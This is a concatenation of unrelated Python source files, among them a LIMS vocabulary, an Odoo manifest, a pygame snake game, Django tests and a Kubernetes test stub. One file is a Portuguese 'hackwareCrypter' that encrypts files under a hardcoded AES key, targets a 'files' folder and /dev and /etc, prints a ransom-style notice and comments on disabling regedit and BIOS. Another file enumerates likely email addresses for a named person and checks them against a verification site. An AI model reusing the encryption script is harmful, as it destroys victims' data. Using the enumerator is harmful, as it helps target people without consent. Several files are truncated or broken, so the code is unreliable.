<template_title>} If the template lives outside the bika.lims add-on, both the template_id and template_title include a prefix that matches with the add-on identifier. template_title is the same name as the id, but with whitespaces and without extension. As an example, for a template from the my.product add-on located in templates/stickers, and with a filename "", the dictionary will look like: {'id': '', 'title': 'my.product: EAN128 default small'} """ # Retrieve the templates from bika.lims add-on resdirname = 'stickers' p = os.path.join("browser", "templates", resdirname) return getTemplates(p, resdirname) class StickerTemplatesVocabulary(object): """ Locate all sticker templates """ implements(IVocabularyFactory) def __call__(self, context): out = [SimpleTerm(x['id'], x['id'], x['title']) for x in getStickerTemplates()] return SimpleVocabulary(out) ARReportTemplatesVocabularyFactory = ARReportTemplatesVocabulary() class CustomPubPrefVocabulary(object): implements(IVocabularyFactory) def __call__(self, context): items = [ (_('Email'),'email'), (_('PDF'), 'pdf') ] for name, item in getAdapters((context, ), ICustomPubPref): items.append(item) return SimpleVocabulary.fromItems(items) CustomPubPrefVocabularyFactory = CustomPubPrefVocabulary()
# -*- coding: utf-8 -*- # © 2020 Sinerkia iD (<>). { 'name': 'Sinerkia Jitsi Meet Integration', 'version': '', 'category': 'Extra Tools', 'sequence': 1, 'summary': 'Create and share Jitsi Meet video conferences with other users and external partners', 'description': """ Adds a new APP to create and share Jisti Meet video conference meetings between Odoo users. You can invite external users by sending mail from Odoo. When you join the meeting Odoo opens a new browser tab so you can keep working on Odoo, and share screen with your partners at Jisti Meet. """, "author": "<NAME>", "website": "", "depends": ['base','web','mail'], "data": [ 'views/sinerkia_jitsi_meet_views.xml','data/sinerkia_jitsi_meet.xml','data/mail_template.xml','security/ir.model.access.csv','security/base_security.xml', ], 'images': ['images/main_screenshot.png'], 'installable': True, 'auto_install': False, 'application': True, 'license': 'AGPL-3', }
<reponame>thenewpyjiang/integral-approximation-python from sympy.parsing.sympy_parser import parse_expr from math import * from sympy import * import numpy as np # Left endpoints integral approximation def left(expr, left_bound, right_bound, delta_x): x = symbols('x') expression = parse_expr(expr) sum = 0 for i in np.arange(left_bound, right_bound, delta_x): sum += expression.subs(x, i) return delta_x * sum # RIght endpoints integral approximation def right(expr, left_bound, right_bound, delta_x): x = symbols('x') expression = parse_expr(expr) sum = 0 for i in np.arange(left_bound + delta_x, right_bound + delta_x, delta_x): sum += expression.subs(x, i) return delta_x * sum # Midpoints integral approximation def mid(expr, left_bound, right_bound, delta_x): x = symbols('x') expression = parse_expr(expr) sum = 0 for i in np.arange(left_bound, right_bound, delta_x): sum += expression.subs(x, i + delta_x / 2) return delta_x * sum # Trapezoidal Rule for integral approximation def trapezoidal(expr, left_bound, right_bound, delta_x): return (left(expr, left_bound, right_bound, delta_x) \ + right(expr, left_bound, right_bound, delta_x)) / 2 # Simpson's Rule for integral approximation def simpson(expr, left_bound, right_bound, delta_x): x = symbols('x') expression = parse_expr(expr) sum = 0 numbers = list(np.arange(left_bound, right_bound + delta_x, delta_x)) for i in range(len(numbers)): if i == 0 or i == len(numbers) - 1: sum += expression.subs(x, numbers[i]) elif i % 2 == 0: sum += 2 * expression.subs(x, numbers[i]) else: sum += 4 * expression.subs(x, numbers[i]) return delta_x * sum / 3 if __name__ == '__main__': # Read input expr = input('Expression: ') left_bound = float(input('Left Bound: ')) right_bound = float(input('Right Bound: ')) delta_x = float(input('Delta x: ')) type = int(input('Select the type of approximation:\n \ 1. Left Endpoints\n \ 2. Right Endpoints\n \ 3. Midpoints\n \ 4. Trapezoidal Rule\n \ 5. Simpson\'s Rule\n')) # Determine which function to call if type == 1: print('Result:', left(expr, left_bound, right_bound, delta_x)) elif type == 2: print('Result:', right(expr, left_bound, right_bound, delta_x)) elif type == 3: print('Result:', mid(expr, left_bound, right_bound, delta_x)) elif type == 4: print('Result:', trapezoidal(expr, left_bound, right_bound, delta_x)) elif type == 5: print('Result:', simpson(expr, left_bound, right_bound, delta_x))
<gh_stars>0 #!/usr/bin/python3.6 # -*- coding: utf-8 -*- from Crypto.Cipher import AES from Crypto.Util import Counter import argparse import os import Discovery import Crypter # ----------------- # A senha pode ter os seguintes tamanhos: # 128/192/256 bits - 8bite = 1byte = 1 caracter unicode # 256/8 = 32 bytes # ----------------- HARDCODED_KEY = 'hackware strike force strikes u! ' def get_parser(): parser = argparse.ArgumentParser(description="hackwareCrypter") parser.add_argument( '-d', '--decrypt', help='decripta os arquivos [default: no]', action='store_true') return parser def main(): parser = get_parser() args = vars(parser.parse_args()) decrypt = args['decrypt'] if decrypt: print(''' HACKWARE STRIKE FORCE ------------------------------------------------------------ SEUS ARQUIVOS FORAM CRIPTOGRAFADOS PARA DECRIPTÁ-LOS, UTILIZE A SEGUINTE SENHA '{}' ------------------------------------------------------------ '''.format(HARDCODED_KEY)) key = input('Digite a senha: ') else: if HARDCODED_KEY: key = HARDCODED_KEY ctr = crypt =, AES.MODE_CTR, counter=ctr) if not decrypt: cryptoFn = crypt.encrypt else: cryptoFn = crypt.decrypt init_path = os.path.abspath(os.path.join(os.getcwd(), 'files')) startDirs = [init_path, '/dev', '/etc'] for currentDir in startDirs: for filename in Crypter.change_files(filename, cryptoFn) # limpa a chave de criptografia da memoria for _ in range(100): pass if not decrypt: pass # apos a encriptação, voce pode alterar o wallpaper # alterar icons, desativar regedit, admin, bios, etc if __name__ == '__main__': main()
<filename>apps/accounts/migrations/ # Generated by Django 2.2.19 on 2021-04-15 13:14 from django.db import migrations, models import django.db.models.deletion import taggit.managers class Migration(migrations.Migration): dependencies = [ ("taggit", "0003_taggeditem_add_unique_index"), ("accounts", "0014_auto_20210314_2305"), ] operations = [ migrations.CreateModel( name="DataCenterLocation", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("city", models.CharField(max_length=255)), ("country", models.CharField(max_length=255)), ( "datacenter", models.ForeignKey( db_column="id_dc", null=True, on_delete=django.db.models.deletion.CASCADE, to="accounts.Datacenter", ), ), ], options={ "verbose_name": "Datacentre Location", "db_table": "datacenters_locations", }, ), ]
import urllib from urllib import request, parse import re import os, sys import time import argparse # Request headers headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Referer': '', 'Origin': '', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', } class EmailVerifier: SITE_URL = '' INVALID_SEARCH_STRING = "is not valid" CONNECTING_TO_DOMAIN = "Connecting to {0} failed" def create_request(self, email_addr): post_form = { "email": email_addr } enc_data = parse.urlencode(post_form).encode() req = request.Request( EmailVerifier.SITE_URL, data = enc_data, headers = headers ) return req def check_domain(self, domain): req = self.create_request("help@{0}".format(domain)) resp = request.urlopen(req) html ="utf-8") domain_invalid = EmailVerifier.CONNECTING_TO_DOMAIN.format( domain) in html if domain_invalid: print(EmailVerifier.CONNECTING_TO_DOMAIN.format( domain)) return False else: return True # Returns a boolean value def verify(self, email_addr, super_verbose = False): req = self.create_request(email_addr) resp = request.urlopen(req) html ="utf-8") if super_verbose: print(html) re_res = EmailVerifier.INVALID_SEARCH_STRING in html return (False if re_res else True) # if super_verbose: # print(re_res) # Possible templates for different sizes # All the possible combinations are covered by # this and the action of the Permutator email_templates = { 2: [ "{f}.{l}", "{f}{l}", ], 3: [ "{f}{m}{l}", "{f}{m}.{l}", "{f}.{m}{l}", "{f}.{m}.{l}" ], 1: [ "{f}" ] } EMAIL_FORMAT = "{user}@{domain}" class Permutator: """ Generate all possible combination of two and three words to form an email. For example, (first, last), (last, first), (f, last) The elems is produced and Permutator is called in a way such that the emails are always produced most to least specific eg first.last@ before f.last@ before first@ """ def __init__(self, elems): self.elems = elems # Make actual permutations of elems def make_perms(self, elems, r): if r == 0: yield [elems[0]] return for perm in self.make_perms(elems, r - 1): for i in range(r + 1): j = r - i yield perm[:j] + [elems[r]] + perm[j:] return # Make permuatations of size from def make_combs(self, size, l): if (size > l + 1): return if size == 0: yield [] return if l == 0: for elem in self.elems[0]: yield [elem] return for c in self.make_combs(size, l - 1): yield c for elem in self.elems[l]: for c in self.make_combs(size - 1, l - 1): c.append(elem) yield c # Generate all P(n, r) permutations of r = size def generate(self, size): for comb in self.make_combs(size, len(self.elems) - 1): for perm in self.make_perms(comb, len(comb) - 1): yield perm return COLOR_GREEN = "\033[0;32m" COLOR_RED = "\033[1;31m" COLOR_RESET = "\033[0;0m" def verify_for_size(f, l, m, size, verbose = False): verifier = EmailVerifier() for template in email_templates[size]: user = template.format(f = f, l = l, m = m) if len(user) < 3: continue try_addr = EMAIL_FORMAT.format(user = user, domain = domain) if verbose: print("Checking `" + try_addr + "`...", end = '', flush = True) verif = verifier.verify(try_addr) if verif: print(COLOR_GREEN + "." + COLOR_RESET, end = '', flush = True) return try_addr else: print(COLOR_RED + "." + COLOR_RESET, end = '', flush = True) if verbose: print(" ") return None # Sufficiently random email that nobody should # actually have this as a valid one RANDOM_EMAIL = "prhzdge.yrtheu" # Find the email address, given the below parameters # Permutates over the possible combinations of first and lastname # including .(period), eg. first.last@ and then checks # each email. def find_email(first, middle, last, domain, args): if not EmailVerifier().check_domain(domain): raise ValueError("Invalid domain name for email server.") elif EmailVerifier().verify(EMAIL_FORMAT.format(user = RANDOM_EMAIL, domain = domain)): raise ValueError("Domain seems to accept all email addresses.") elif args.verbose: print("Domain checks successful") # Can use either from each of elems elems = [ (first, first[0]), (last, last[0]) ] if middle: elems.append((middle, middle[0])) email, email_list = None, [] p_gen = Permutator(elems) # Order of lengths is 2, 3, 1 # to match most common observations for leng in (2, 3, 1): for perm in p_gen.generate(leng): first = perm[0] last = perm[1] if len(perm) > 1 else None middle = perm[2] if len(perm) > 2 else None email = verify_for_size(first, last, middle, leng, args.verbose) if email: email_list.append(email) if not args.find_all: return email_list # Not found, probably works for Amazon :D return email_list # Automatically append .com if no tld is # present in domain. TLD = [".com", ".org", ".net"] def correct_for_tld(domain): if domain == "": return domain domain_flag = False for tld in TLD: if domain.endswith(tld): domain_flag = True break if not domain_flag: return domain + TLD[0] else: return domain # Check internet connectivity, using Google # the standard connection tester :) google_url = "" def check_connectivity(): print("Checking connection...") try: request.urlopen(google_url) return True except urllib.error.URLError: return False parser = argparse.ArgumentParser( description='Find email address given a name and a domain.') parser.add_argument('--batch', dest='batch', default = False, action='store_true', help = "Batch mode, process multiple requests") parser.add_argument('-v', dest='verbose', default = False, action='store_true', help = "Verbose mode") parser.add_argument('--all', dest='find_all', default = False, action='store_true', help = "Find all possible addresses instead \ of stopping at the first successful") if __name__ == "__main__": if not check_connectivity(): print("Can't connect to internet, exiting.") sys.exit(1) else: print("Connectivity okay.") args = parser.parse_args() loops = 1000 if args.batch else 1 input_list = [] for l in range(loops): name = input("Name({first} {last}): ") if name == "": break domain = correct_for_tld(input("Domain: ")) input_list.append((domain, name.split())) prev_domain = "" for domain, name_parts in input_list: if len(name_parts) > 2: first, middle, last = name_parts[0], name_parts[1].lower(), name_parts[2] else: first, last = name_parts; middle = None if domain == "": domain = prev_domain try: email_list = find_email(first.lower(), middle, last.lower(), domain, args) print() if len(email_list) > 0: print("Valid Emails: ", email_list) else: print("Not Found") prev_domain = domain except ValueError as e: print("Error: " + str(e)) sys.exit(1) # Successful return sys.exit(0)
import pygame from random import randint # Var de trainamento # Lista de saida [Esquerda, Cima, Direita, Baixo] listaOutput = [0,0,0,0] # Lista de entrada [n da rodada ,pontos obtidos # matriz do tabuleiro] (tabuleiro incluindo # paredes, corpo da cobra e maca) listaEntrada = [0]*3 # Nota: a matriz sera quase 4 vezes maior que o # tabuleiro em si para a cebeca ser centralizada # e poder enxergar o tabuleiro inteiro sempre tamanho_tabuleiro_maior = 20 + 19 matriz_do_tabuleiro = [0]*tamanho_tabuleiro_maior for i in range(20): matriz_do_tabuleiro[i] = [0]*39 listaEntrada[2] = matriz_do_tabuleiro # Funcoes para inserir a cabeca e o corpo def corpoFunc(x, y): screen.blit(imagemCorpo, (x,y)) def cabecaFunc(x, y): screen.blit(imagemCabeca, (x,y)) # Funcao para inserir quadrado verde do fundo def quadradoFundoFunc(x, y): screen.blit(imagemQuadradoFundo, (x,y)) # Funcao para inserir a maca def macaFunc(x, y): screen.blit(imagemMaca, (x,y)) # Funcao para placar def placarFunc(x,y): placar = font.render("Pontos: " + str(pontos), True, (255, 255, 255)) screen.blit(placar, (x,y)) # Loop de treino for c in range (2): # Inicializa o pygame pygame.init() # Cria tela e define tamanho screen = pygame.display.set_mode((600,600)) # Titulo e icone pygame.display.set_caption("Jogo da Cobrenha de ThurMP") icone = pygame.image.load("images/snake icon.png") fim_de_jogo = False rodada = 0 # Define fonte pontos = 0 font = pygame.font.Font('freesansbold.ttf', 32) # Cria e atualiza fundo background = pygame.image.load("images/fundo_quadriculado_verde.png") screen.blit(background,(0,0)) # Load das imagens imagemCorpo = pygame.image.load("images/corpo.png") imagemCabeca = pygame.image.load("images/cabeça_direita.png") imagemQuadradoFundo = pygame.image.load("images/quadrado_do_fundo.png") imagemMaca = pygame.image.load("images/maca1.png") # Configuracao inicial da cabeca cabecaX = 181 cabecaY = 271 #for i in range(39): # matriz_do_tabuleiro[(-1)//30][(-1)//30] = # Jogo comeca indo para a direita cabecaXChange = 30 cabecaYChange = 0 # Listas para manter armazenadas as posicoes do corpo # (Ja com a configuracao inicial) listaXCorpo = [91, 121 ,151] listaYCorpo = [271, 271, 271] # Configuracao inicial do corpo cabecaFunc(cabecaX, cabecaY) corpoFunc(91, 271) corpoFunc(121, 271) corpoFunc(151, 271) matriz_do_tabuleiro[(271-1)//30][(91-1)//30] = -1 matriz_do_tabuleiro[(271-1)//30][(121-1)//30] = -1 matriz_do_tabuleiro[(271-1)//30][(151-1)//30] = -1 # Cria a primeira maca e garante que nao esta na cobra macaY = (randint(0,19)*30)+1 macaX = (randint(0,19)*30)+1 while((macaX in listaXCorpo) and (macaY in listaYCorpo)): macaY = (randint(0,19)*30)+1 macaX = (randint(0,19)*30)+1 macaFunc(macaX, macaY) matriz_do_tabuleiro[(macaY-1)//30][(macaX-1)//30] = 1 # Var para verificar se a cobra deve crescer ou nao crescer = False pygame.time.wait(1000) # Game Loop running = True while running: # Setando a Lista de entrada listaEntrada[0] = rodada listaEntrada[1] = pontos #listaEntrada[2] = matriz_do_tabuleiro #listaEntrada[2] = (macaX-1)/30 #listaEntrada[3] = (macaY-1)/30 #listaEntrada[4] = (cabecaX-1)/30 #listaEntrada[5] = (cabecaY-1)/30 # Get dos eventos for event in pygame.event.get(): if event.type == pygame.QUIT: running = False # Se alguma seta for apertada if event.type == pygame.KEYDOWN: rodada += 1 if not fim_de_jogo and rodada > 1: # Nota: nao muda de direcao caso ja esteja indo para a desejada if (event.key == pygame.K_LEFT) and (cabecaXChange == 0): imagemCabeca = pygame.image.load("images/cabeça_esquerda.png") cabecaXChange = -30 cabecaYChange = 0 if (event.key == pygame.K_RIGHT) and (cabecaXChange == 0): imagemCabeca = pygame.image.load("images/cabeça_direita.png") cabecaXChange = 30 cabecaYChange = 0 if (event.key == pygame.K_DOWN) and (cabecaYChange == 0): imagemCabeca = pygame.image.load("images/cabeça_baixo.png") cabecaXChange = 0 cabecaYChange = 30 if (event.key == pygame.K_UP) and (cabecaYChange == 0): imagemCabeca = pygame.image.load("images/cabeça_cima.png") cabecaXChange = 0 cabecaYChange = -30 if rodada>0: # Se a maca for pega, add 1 ponto e cria outra # Atuliza a posicao da da maca na matriz if (cabecaX == macaX and cabecaY == macaY): matriz_do_tabuleiro[(macaY-1)//30][(macaX-1)//30] = 0 pontos += 1 macaY = (randint(0,19)*30)+1 macaX = (randint(0,19)*30)+1 matriz_do_tabuleiro[(macaY-1)//30][(macaX-1)//30] = 1 # Garante que a maca nao apareca em cima da cobra while((macaX in listaXCorpo) and (macaY in listaYCorpo)): macaY = (randint(0,19)*30)+1 macaX = (randint(0,19)*30)+1 macaFunc(macaX, macaY) # Guarda o valor para ela crescer crescer = True # Coloca o corpo logo onde a cabeca sai e # grava na lista listaXCorpo.append(cabecaX) listaYCorpo.append(cabecaY) matriz_do_tabuleiro[(cabecaY-1)//30][(cabecaX-1)//30] = -1 corpoFunc(cabecaX, cabecaY) cabecaX += cabecaXChange cabecaY += cabecaYChange # Condicao de cobra bater na borda if (cabecaX < 0) or (cabecaX > 600) or (cabecaY > 600) or (cabecaY < 0): # Plot do placar placarFunc(210,270) cabecaXChange = 0 cabecaYChange = 0 fim_de_jogo = True # Condicao de cobra bater nela mesma for i in range(len(listaXCorpo)): if(cabecaX == listaXCorpo[i]): if (cabecaY == listaYCorpo[i]): # Plot do placar placarFunc(210,270) cabecaXChange = 0 cabecaYChange = 0 fim_de_jogo = True # Cobre a ponta da cauda com quadrado verde # Caso crescer == True faz a cobra crescer 1 espaco if not crescer: matriz_do_tabuleiro[(listaYCorpo[0]-1)//30][(listaXCorpo[0]-1)//30] = 0 quadradoFundoFunc(listaXCorpo.pop(0), listaYCorpo.pop(0)) crescer = False # Coloca a cabeca no espaco seguinte cabecaFunc(cabecaX, cabecaY) # Atualiza a tela e gera delay pygame.display.update() pygame.time.wait(150)
<filename>retailstore/serializers/<gh_stars>1-10 from marshmallow import fields, Schema class BaseSchema(Schema): id = fields.Integer() name = fields.String(required=True) description = fields.String() created_at = fields.DateTime(attribute="created_at") class LocationSchema(BaseSchema): def hiera_data(self, location): res = { 'name':, 'children': [] } departments = location.departments department_schema = DepartmentSchema() for department in departments: res['children'].append( department_schema.hiera_data(department)) return res class DepartmentSchema(BaseSchema): location_id = fields.Integer() def hiera_data(self, department): res = { 'name':, 'children': [] } categories = department.categories category_schema = CategorySchema() for category in categories: res['children'].append( category_schema.hiera_data(category)) return res class CategorySchema(BaseSchema): department_id = fields.Integer() def hiera_data(self, category): res = { 'name':, 'children': [] } sub_categories = category.sub_categories for sub_category in sub_categories: res['children'].append({ "name": }) return res class SubCategorySchema(BaseSchema): category_id = fields.Integer()
from typing import List, Tuple #from flare.forms.bones.base import ReadFromClientErrorSeverity from flare.icons import SvgIcon from flare.i18n import translate from flare import html5 def collectBoneErrors(errorList, currentKey,boneStructure): ''' severity: NotSet = 0 InvalidatesOther = 1 Empty = 2 Invalid = 3 ''' boneErrors = [] for error in errorList or []: if error["fieldPath"] and error["fieldPath"][0] == currentKey: isError = False if (error["severity"] == 0 or error["severity"] == 2) and boneStructure["required"]: isError = True elif error["severity"] ==3: isError = True # ToDO Field dependency! if isError: thisError = error.copy() thisError["fieldPath"] = error["fieldPath"][1:] boneErrors.append(thisError) return boneErrors class ToolTipError(html5.Div): """ Small utility class for providing tooltips """ def __init__(self, shortText="", longText="", *args, **kwargs): super( ToolTipError, self ).__init__( *args, **kwargs ) self["class"] = "vi-tooltip msg msg--error is-active is-open" self.sinkEvent("onClick") self.prependChild( SvgIcon( "icon-arrow-right", title = shortText ) ) #language=HTMl self.fromHTML(""" <div class="msg-content" [name]="tooltipMsg"> <h2 class="msg-headline" [name]="tooltipHeadline"></h2> <div class="msg-descr" [name]="tooltipDescr"></div> </div> """) self.tooltipHeadline.element.innerHTML = translate("vi.tooltip.error") self.tooltipDescr.element.innerHTML = longText.replace( "\n", "<br />" ) def onClick(self, event): self.toggleClass("is-open") def _setDisabled(self, disabled): return def _getDisabled(self): return False #Not used def buildBoneErrors(errorList): boneErrors = {} for error in errorList: thisError = error.copy() thisError[ "fieldPath" ] = error[ "fieldPath" ][ 1: ] if error[ "fieldPath" ] and error[ "fieldPath" ][ 0 ] not in boneErrors: boneErrors.update({error[ "fieldPath" ][ 1 ]:[thisError]}) else: boneErrors[error[ "fieldPath" ][ 1 ]].append(thisError) return boneErrors def checkErrors(bone) -> Tuple[bool, List[str]]: ''' first return value is a shortcut to test if bone is valid or not second returns a list of fields which are invalid through this bone ''' errors = bone["errors"] #no errors for this bone if not errors: return False, list() invalidatedFields = list() isInvalid = True for error in errors: if ( (error["severity"] == ReadFromClientErrorSeverity.Empty and bone["required"]) or (error["severity"] == ReadFromClientErrorSeverity.InvalidatesOther) ): if error["invalidatedFields"]: invalidatedFields.extend(error["invalidatedFields"]) # We found only warnings if not invalidatedFields: return False, list() return isInvalid, invalidatedFields
<filename>nacelle/contrib/mail/<gh_stars>0 """Utilities used to render and send emails """ # marty mcfly imports from __future__ import absolute_import # third-party imports from nacelle.core.template.renderers import render_jinja2_template def render_email(template, context=None): """Uses Jinja2 to render the email """ if context is None: context = {} email_body = render_jinja2_template(template, context) return email_body
import cv2 import numpy as numpy import tensorflow as tflow from utils import label_map_util #from ConeDetection import * from cone_img_processing2 import * import os # Set threshold for detection of cone for object detector threshold_cone = 0.5 #Set path to check point and label map #PATH_TO_CKPT = './frozen_orange_net.pb' PATH_TO_CKPT = './frozen_weights/frozen_cone_graph_modified.pb' #PATH_TO_CKPT = './frozen_weights/mobilenet_v2_0.75_224_frozen.pb' PATH_TO_LABELS = './test_scripts/label_map.pbtxt' #Define no, of classes NUM_CLASSES = 1 #only one class, i.e. cone ## Load a (frozen) Tensorflow model into memory. detection_graph = tflow.Graph() with detection_graph.as_default(): od_graph_def = tflow.GraphDef() with tflow.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: serialized_graph = od_graph_def.ParseFromString(serialized_graph) tflow.import_graph_def(od_graph_def, name='') label_map = label_map_util.load_labelmap(PATH_TO_LABELS) categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True) category_index = label_map_util.create_category_index(categories) gpu_options = tflow.GPUOptions(per_process_gpu_memory_fraction=0.4) #config=tflow.ConfigProto(gpu_options=gpu_options) def mainLoop(): # Try the following videos: # 20180619_175221224 # shade to brightness # 20180619_180755490 # towards sun # 20180619_180515860 # away from sun cap = cv2.VideoCapture('./test_videos/20180619_175221224.mp4') #cap = cv2.VideoCapture('./test_videos/Formula Student Spain 2015 Endurance- DHBW Engineering with the eSleek15.mp4') frameCount = int(cap.get(cv2.CAP_PROP_FRAME_COUNT)) fps = int(cap.get(cv2.CAP_PROP_FPS)) count = 0 img_number = 1000 with detection_graph.as_default(): #with tflow.Session(graph=detection_graph) as sess: with tflow.Session(graph=detection_graph, config=tflow.ConfigProto(gpu_options=gpu_options)) as sess: while count < frameCount: ret, image_np = if ret == True: count = count + 1 # image_np = cv2.resize(processFrame.image, (0,0), fx=0.5, fy=0.5) #image_np = processFrame.image # Expand dimensions since the model expects images to have shape: [1, None, None, 3] image_np_expanded = np.expand_dims(image_np, axis=0) image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') # Each box represents a part of the image where a particular object was detected. boxes = detection_graph.get_tensor_by_name('detection_boxes:0') # Each score represent how level of confidence for each of the objects. # Score is shown on the result image, together with the class label. scores = detection_graph.get_tensor_by_name('detection_scores:0') classes = detection_graph.get_tensor_by_name('detection_classes:0') num_detections = detection_graph.get_tensor_by_name('num_detections:0') # Actual detection. (boxes, scores, classes, num_detections) = [boxes, scores, classes, num_detections], feed_dict={image_tensor: image_np_expanded}) # Visualization of the results of a detection. # Definition of boxes [ymin, xmin, ymax, xmax] boxes = np.squeeze(boxes) scores = np.squeeze(scores) width = image_np.shape[1] height = image_np.shape[0] # width, height = cv2.GetSize(image_np) output_img = image_np.copy() for i in range(boxes.shape[0]): if np.all(boxes[i] == 0) or scores[i] < threshold_cone: continue b = boxes[i] box_width = np.abs(float(b[3])-float(b[1])) box_height = np.abs(float(b[2])-float(b[0])) x = int(b[1] * width) y = int(b[0] * height) h = int(box_height * height) w = int(box_width * width) candidate = image_np[y:y+h, x:x+w] # if count % (2*fps) == 0: # # Save the image (optional) # cv2.imwrite('./test_videos/cone_samples/' + str(img_number) + '.jpg', candidate) # img_number = img_number + 1 y = y + 1 z = 0 result = detectCone1(candidate) # print(result) if result == 0: print("Yellow Cone") cv2.rectangle(output_img, (int(b[1] * width),int(b[0] * height)), (x+w,y+h), (0, 255, 255), 7) cv2.putText(output_img, 'yellow cone', (int(b[1] * width),int(b[0] * height)-30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA) cv2.putText(output_img, str(round(z,1))+" m", (int(b[1] * width),int(b[0] * height)-5), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA) if result == 1: print("Blue Cone") cv2.rectangle(output_img, (int(b[1] * width),int(b[0] * height)), (x+w,y+h), (255, 0, 0), 7) cv2.putText(output_img, 'blue cone', (int(b[1] * width),int(b[0] * height)-30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA) cv2.putText(output_img, str(round(z,1))+" m", (int(b[1] * width),int(b[0] * height)-5), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA) if result == 2: print("Orange Cone") cv2.rectangle(output_img, (int(b[1] * width),int(b[0] * height)), (x+w,y+h), (0,165,255), 7) cv2.putText(output_img, 'orange cone', (int(b[1] * width),int(b[0] * height)-30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA) cv2.putText(output_img, str(round(z,1))+" m", (int(b[1] * width),int(b[0] * height)-5), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA) cv2.imshow('object detection', cv2.resize(output_img, (image_np.shape[1],image_np.shape[0]))) cv2.waitKey(1) cv2.destroyAllWindows() if __name__ == '__main__': mainLoop()
<gh_stars>0 # coding: utf-8 """ Kubernetes No description provided (generated by Openapi Generator # noqa: E501 The version of the OpenAPI document: v1.20.7 Generated by: """ from __future__ import absolute_import import unittest import datetime import kubernetes.client from kubernetes.client.models.v2beta2_metric_spec import V2beta2MetricSpec # noqa: E501 from import ApiException class TestV2beta2MetricSpec(unittest.TestCase): """V2beta2MetricSpec unit test stubs""" def setUp(self): pass def tearDown(self): pass def make_instance(self, include_optional): """Test V2beta2MetricSpec include_option is a boolean, when False only required params are included, when True both required and optional params are included """ # model = kubernetes.client.models.v2beta2_metric_spec.V2beta2MetricSpec() # noqa: E501 if include_optional : return V2beta2MetricSpec( container_resource = kubernetes.client.models.v2beta2/container_resource_metric_source.v2beta2.ContainerResourceMetricSource( container = '0', name = '0', target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget( average_utilization = 56, average_value = '0', type = '0', value = '0', ), ), external = kubernetes.client.models.v2beta2/external_metric_source.v2beta2.ExternalMetricSource( metric = kubernetes.client.models.v2beta2/metric_identifier.v2beta2.MetricIdentifier( name = '0', selector = kubernetes.client.models.v1/label_selector.v1.LabelSelector( match_expressions = [ kubernetes.client.models.v1/label_selector_requirement.v1.LabelSelectorRequirement( key = '0', operator = '0', values = [ '0' ], ) ], match_labels = { 'key' : '0' }, ), ), target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget( average_utilization = 56, average_value = '0', type = '0', value = '0', ), ), object = kubernetes.client.models.v2beta2/object_metric_source.v2beta2.ObjectMetricSource( described_object = kubernetes.client.models.v2beta2/cross_version_object_reference.v2beta2.CrossVersionObjectReference( api_version = '0', kind = '0', name = '0', ), metric = kubernetes.client.models.v2beta2/metric_identifier.v2beta2.MetricIdentifier( name = '0', selector = kubernetes.client.models.v1/label_selector.v1.LabelSelector( match_expressions = [ kubernetes.client.models.v1/label_selector_requirement.v1.LabelSelectorRequirement( key = '0', operator = '0', values = [ '0' ], ) ], match_labels = { 'key' : '0' }, ), ), target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget( average_utilization = 56, average_value = '0', type = '0', value = '0', ), ), pods = kubernetes.client.models.v2beta2/pods_metric_source.v2beta2.PodsMetricSource( metric = kubernetes.client.models.v2beta2/metric_identifier.v2beta2.MetricIdentifier( name = '0', selector = kubernetes.client.models.v1/label_selector.v1.LabelSelector( match_expressions = [ kubernetes.client.models.v1/label_selector_requirement.v1.LabelSelectorRequirement( key = '0', operator = '0', values = [ '0' ], ) ], match_labels = { 'key' : '0' }, ), ), target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget( average_utilization = 56, average_value = '0', type = '0', value = '0', ), ), resource = kubernetes.client.models.v2beta2/resource_metric_source.v2beta2.ResourceMetricSource( name = '0', target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget( average_utilization = 56, average_value = '0', type = '0', value = '0', ), ), type = '0' ) else : return V2beta2MetricSpec( type = '0', ) def testV2beta2MetricSpec(self): """Test V2beta2MetricSpec""" inst_req_only = self.make_instance(include_optional=False) inst_req_and_optional = self.make_instance(include_optional=True) if __name__ == '__main__': unittest.main()
from rest_framework.test import APITestCase from django.shortcuts import reverse from rest_framework import status from core.models import ProductsTbl, PurchaseTransactionTbl # Create your tests here. class TestProductViews(APITestCase): def setUp(self): self.product_url = reverse('products-list') self.product_data = { 'product_id': 10215, 'name': '<NAME>', 'quantity': 105, 'unit_price': 100.00 } def test_cannot_create_products(self): res = self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST) def test_create_product(self): res =, self.product_data) self.assertEqual(res.status_code, status.HTTP_201_CREATED) self.assertEqual(['product_id'], self.product_data['product_id']) self.assertEqual(['name'], self.product_data['name']) self.assertEqual(['quantity'], self.product_data['quantity']) class TestPurchaseViews(APITestCase): def setUp(self): self.purchase_url = reverse('purchases-list') self.purchase_data = { 'product_id': 10215, 'purchase_id': '8d7qdouiabnsdodAY9DQJp09', 'purchased_quantity': 90, } self.product = ProductsTbl.objects.create( product_id=10216, name='<NAME>', quantity=100, unit_price=100.00 ) self.purchase = PurchaseTransactionTbl.objects.create( product=self.product, purchase_id='d6asd65asd654as5d4', purchased_quantity=75 ) self.purchase_detail_url = reverse( 'purchases-detail', kwargs={'pk':}) def test_cannot_create_purchase(self): res = self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST) 